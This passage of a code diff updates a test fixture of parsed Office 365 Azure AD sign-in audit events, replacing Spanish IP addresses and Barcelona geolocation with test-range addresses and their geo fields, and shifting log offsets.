         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 31498,
+        "log.offset": 31456,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2209,10 +2174,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:51:45",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2241,20 +2206,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -2272,8 +2236,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:01.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2291,7 +2255,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 32948,
+        "log.offset": 32906,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2308,10 +2272,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:01",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2340,20 +2304,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2371,8 +2333,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:51.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2390,7 +2352,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 34398,
+        "log.offset": 34354,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2407,10 +2369,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "00000003-0000-0ff1-ce00-000000000000",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:51",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2439,20 +2401,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -2470,8 +2430,8 @@
     },
     {
         "@timestamp": "2020-02-12T21:38:29.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2489,7 +2449,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 35847,
+        "log.offset": 35799,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2506,10 +2466,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T21:38:29",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2538,20 +2498,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -2569,8 +2528,8 @@
     },
     {
         "@timestamp": "2020-02-12T21:38:37.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2588,7 +2547,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 37297,
+        "log.offset": 37249,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2605,10 +2564,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T21:38:37",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2637,20 +2596,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -2668,8 +2626,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:51:50.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2687,7 +2645,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 38748,
+        "log.offset": 38700,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2704,10 +2662,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:51:50",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2736,20 +2694,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -2767,8 +2724,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:42.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2786,7 +2743,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 40199,
+        "log.offset": 40151,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2803,10 +2760,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:42",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2835,20 +2792,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2866,8 +2821,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:42:59.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2885,7 +2840,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 41650,
+        "log.offset": 41600,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2902,10 +2857,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:42:59",
         "o365.audit.ExtendedProperties.RequestType": "Login:login",
         "o365.audit.ExtendedProperties.ResultStatusDetail": "Success",
@@ -2933,20 +2888,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -2964,8 +2917,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:02.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoginFailed",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2983,7 +2936,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 43031,
+        "log.offset": 42977,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3000,10 +2953,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:02",
         "o365.audit.ExtendedProperties.FlowTokenScenario": "Login",
         "o365.audit.ExtendedProperties.RequestType": "Login:login",
@@ -3033,20 +2986,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -3064,8 +3015,8 @@
     },
     {
         "@timestamp": "2020-02-12T21:38:19.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3082,7 +3033,7 @@
         "fileset.name": "audit",
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "input.type": "log",
-        "log.offset": 44539,
+        "log.offset": 44481,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3091,10 +3042,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T21:38:19",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Logout",
         "o365.audit.ExtendedProperties.ResultStatusDetail": "Success",
@@ -3122,19 +3073,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -3149,8 +3099,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:40.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3168,7 +3118,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 45648,
+        "log.offset": 45590,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3185,10 +3135,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:40",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -3217,20 +3167,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -3248,8 +3196,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:30:58.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3266,7 +3214,7 @@
         "fileset.name": "audit",
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "input.type": "log",
-        "log.offset": 47098,
+        "log.offset": 47036,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3275,10 +3223,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:30:58",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Logout",
         "o365.audit.ExtendedProperties.ResultStatusDetail": "Success",
@@ -3306,19 +3254,17 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3333,8 +3279,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:31:33.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoginFailed",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3352,7 +3298,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 48207,
+        "log.offset": 48143,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3369,10 +3315,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c",
         "o365.audit.AzureActiveDirectoryEventType": 1,
